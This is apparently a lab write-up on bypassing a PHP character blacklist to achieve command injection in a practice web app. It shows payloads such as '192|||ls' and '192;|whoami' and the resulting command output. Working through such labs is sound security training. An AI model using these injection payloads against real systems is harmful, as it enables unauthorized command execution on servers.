### Objective

Remotely, find out the user of the web service on the OS, as well as the machines hostname via RCE.

Let's try our common payloads first.
```txt
192;ls
```
```txt
192;wh'o'am'i
```
Looks like none of them worked. Time to view the source code.
```html
 // Set blacklist
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

```
Looks like there is a list of blacklist and it' being replaced by nothing.Let's see what else we can do. What if we put triple pipes?
```html
192|||ls
help
index.php
source
```
Let's try 2 different characters at the same time.
```html
192;|whoami
www-data
```
So basically it only checks and removes 1 of the characters.

